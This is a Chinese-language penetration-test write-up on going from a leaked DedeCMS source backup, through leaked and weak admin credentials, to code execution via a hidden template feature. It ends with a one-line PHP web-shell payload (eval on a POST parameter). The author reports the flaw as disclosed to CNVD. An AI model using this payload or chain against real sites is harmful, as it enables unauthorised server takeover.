实战！记一次从源码泄露到Getshell

0x00 前言 此次渗透中的所有修改已经复原，且漏洞已经提交至cnvd平台 0x01 源码泄露 在一个月黑风高的夜晚，闲来无事的我又开着脚本利用hunter进行互联网站点源码的扫描 在查看备份文件扫描结果时，看到了宝贝 二话不说，访问下载得到源码！ 可以在注释信息处发现dedecms的痕迹 敏感信息泄露 获得源码的第一步当然是获取敏感信息，先尝试全局搜索（crtl+shift+f）关键词 keypwdpasswdpassword 1. 数据库信息泄露 2. 后台管理员密码泄露 md5解密尝试解密，居然是一个弱口令 有了账户密码后当然是要找到后台管理地址，那么有了源码后台管理地址还不是手到擒来？ 0x02 后台RCE->getshell 源码中找到后台地址（居然改了个888） 用泄露的admin/admin888进入后台后，发现版本信息为dedecms PS1 历史漏洞 既然已经获得了cms信息，第一步当然看看他的历史漏洞，查找SP1历史漏洞都是远程代码包含漏洞，但是这个站点已经将关键文件install.php删除（源码中不存在） 抱着侥幸心里又去尝试访问一下（说不定后来又加上了呢）确实不存在，只能继续查看其他功能点，然后也尝试测试了许多SP2的漏洞payload但均失败 继续测试其他点 继续查看发现系统设置->系统基本参数->其他选项中有模板引擎的禁用函数 但是明明没有模板引擎功能他为什么要禁用呢？我带着这个疑问又重新翻看源码，果然又找到模板相关文件，（说明只是功能点被隐藏，文件依旧还在） 尝试访问，成功访问到并且能够正常执行 那么就好办了，根据dedecms模板规则，后台模板写入payload，访问即可执行PHP代码 {dede:field name='source' runphp='yes'}@eval($_POST['lyy']);